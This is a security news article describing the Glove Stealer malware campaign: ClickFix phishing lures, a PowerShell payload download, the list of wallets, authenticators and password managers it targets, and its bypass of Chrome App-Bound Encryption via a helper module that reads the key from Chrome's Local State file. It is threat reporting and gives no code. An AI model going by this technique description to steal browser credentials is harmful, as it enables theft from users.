FacebookTwitterLinkedIn

Glove Stealer Bypasses App-Bound Encryption

Karolis Liucveikis Written by on

In a recent article by security firm Gen Digital, researchers detailed a new campaign delivering Glove Stealer as its primary malware payload.

The new stealer was discovered as the payload has been named Glove by Gen Digital and uses ClickFix social engineering tactics to gain high privileges and install the malware. This is another instance of threat actors favoring info-stealing malware recently while relying on ClickFix or FakeCapthca tactics for distribution.

Glove Stealer Bypasses App-Bound Encryption

Briefly, Glove is seen as a relatively simple info stealer with minimal obfuscation or protection mechanisms, suggesting it is still under development. However, how it bypasses App-Bound Encryption in Chrome using the iElevator service certainly piqued the interest of security researchers.

In summary, the malware will attempt to exfiltrate sensitive information from a list of 280 browser extensions and more than 80 locally installed applications. These extensions and applications typically involve cryptocurrency wallets, 2FA authenticators, password managers, and email clients.

In the attack campaign discovered by Gen Digital, distribution of the new stealer begins with a spam phishing email campaign. With the spam email, an attachment is present in HTML format. An HTML page like this contains the ClickFix tactics, showing a crafted fake error message stating that some content couldn't be accessed properly, then advising the user how to fix it.

By following the instructions, the user, believing the instructions are not malicious, copies a malicious script to their clipboard and unintentionally infects their own machine after executing it in a terminal or the Run prompt.

In one of the campaigns seen by researchers, the ClickFix aspect maintains its charade by masquerading as a solution to a DNS issue. The command entered into PowerShell will download the payload encrypted in Base64, decrypt it, and execute it.

At the same time, the user will be displayed messages in the terminal diagnosing the supposed problem, then stating it is searching for the solution while downloading the payload.

Once the malware is installed, there will be a check to see if it is initialized correctly. If so, the malware will run every 55 seconds and use well-known browser name strings to see what browsers are currently running. When one is found before it exfiltrates data, it will terminate browser processes.

To better determine what valuable information could be stolen and where vast lists of predefined locally installed applications and browser extensions. As mentioned above, the extensive list includes 84 defined locations for the locally installed apps and 280 browser extensions.

Rather than providing an exact list, researchers noted that the list focuses on:

  • A wide variety of cryptocurrency wallet browser extensions
  • 2FA authenticators, including Google Authenticator, Microsoft, Aegis, and LastPass, to name a few
  • Password managers, including Bitwarden, LastPass, and KeePass, to name a few
  • Email clients like Thunderbird
  • Gaming platforms like Steam and Battle.net

App-Bound Encryption Process

To steal data from Chrome, which, as of version 127, included app-bound encryption as a standard security feature. This feature encrypts data and cookies to an app's identity.

If a malicious actor exfiltrated this data, it would be encrypted and practically useless unless the threat actor had access to the encryption keys. However, in October 2024, Alexander Hagenah found and publicly disclosed a flaw in this process.

In the case of Glove Stealer, when attempting to steal data from Chrome, the malware requests .NET payload from an attacker-controlled server. This payload is a supporting module that is relatively small and dedicated to bypassing the app-bound encryption using the IElevator service.

The payload was named "zagent.exe" by the malware authors, and once executed, the module uses a hardcoded "app_bound_encrypted_key":" string for searching and retrieving the App-Bound encryption key stored in the local state file: %LOCALAPPDATA%\Google\Chrome\User Data\Local State.

Once the key is retrieved, it is Base64-decoded and stored in a dedicated file called "chromekey.txt," which can be accessed by Glove Stealer itself. After that, the command-and-control server is pinged to indicate the bypass was successful.

Since App-Bound Encryption also performs path validation for the location of the caller processes, this supporting module must be placed in Chrome's Program Files directory tree. This means that Glove Stealer needs to acquire local admin privileges first before it can use this supporting module.

With all this considered, researchers concluded the following,

In this analysis, we described Glove Stealer, an information stealer observed in recent phishing campaigns that leverage social engineering tactics, such as ClickFix. In these tactics, the attackers aim to trick users into thinking they are helping themselves, when in reality, they are inadvertently infecting their devices by following the instructions provided by the attackers…Glove Stealer is capable of stealing various kinds of information from many browsers, including Chrome, Firefox, Edge, Brave and others. To achieve this, Glove Stealer uses a dedicated supporting module that leverages IElevator service to bypass App-Bound encryption. Additionally, it steals sensitive data from two extensive lists: one representing locally installed applications and the other representing browser extensions. These include cryptocurrency wallets extensions, 2FA authenticators, password managers, email clients and more.


▼ Show Discussion

About the author:

Karolis Liucveikis

Karolis Liucveikis - experienced software engineer, passionate about behavioral analysis of malicious apps.

Author and general operator of PCrisk's "Removal Guides" section. Co-researcher working alongside Tomas to discover the latest threats and global trends in the cyber security world. Karolis has experience of over five years working in this branch. He attended KTU University and graduated with a degree in Software Development in 2017. Extremely passionate about technical aspects and behavior of various malicious applications. Contact Karolis Liucveikis.

PCrisk security portal is brought by a company RCS LT. Joined forces of security researchers help educate computer users about the latest online security threats. More information about the company RCS LT.

Our malware removal guides are free. However, if you want to support us you can send us a donation.

About PCrisk

PCrisk is a cyber security portal, informing Internet users about the latest digital threats. Our content is provided by security experts and professional malware researchers. Read more about us.

New Removal Guides
Malware activity

Global malware activity level today:

Medium threat activity

Increased attack rate of infections detected within the last 24 hours.

Virus and malware removal

This page provides information on how to avoid infections by malware or viruses and is useful if your system suffers from common spyware and malware attacks.

Learn about malware removal

Top Removal Guides
Latest News
Blog